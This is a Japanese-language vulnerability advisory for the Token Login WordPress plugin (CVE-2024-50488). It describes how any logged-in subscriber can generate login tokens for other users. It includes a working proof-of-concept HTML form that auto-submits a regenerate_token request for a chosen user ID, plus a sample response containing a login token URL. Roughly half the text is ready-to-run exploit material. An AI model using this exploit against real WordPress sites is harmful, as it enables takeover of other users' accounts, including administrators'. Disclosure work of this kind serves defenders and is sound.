
Token Login <= 1.0.3 - 認証済み(購読者+)権限昇格
Token Login <= 1.0.3 - 認証済み(購読者以上)権限昇格
セキュアなトークン化URLを使用した自動ログイン。ロールごとのログイン制限。WordPress用プラグインは、すべてのバージョン(1.0.3を含む)において、アカウント乗っ取りによる特権昇格の脆弱性があります。これは、プラグインが他のユーザーのログイントークンを生成する権限をユーザーが持っているかどうかを適切に検証しないためです。これにより、購読者レベルのアクセス以上の認証済み攻撃者が、管理者を含む他のユーザーとしてログインできる可能性があります。
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50488
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: token-login
ログイン後、このHTMLを送信してください。 URLをあなたがログインしているWordPressサイトのものに変更してください。 トークンを生成したいユーザーのIDに変更してください。 URLをコピーして、そのユーザーとしてログインできます。
<html>
<body>
<form action="http://kubernetes.docker.internal/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tl_admin_ajax_action" />
<input type="hidden" name="method" value="regenerate_token" />
<input type="hidden" name="user_id" value="7" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
応答
{"status":"success","message":"Successfully regenerated token!","token_url":"http:\/\/kubernetes.docker.internal?__token__=1c8dc9406bc444d1f5cea37fae130f92"}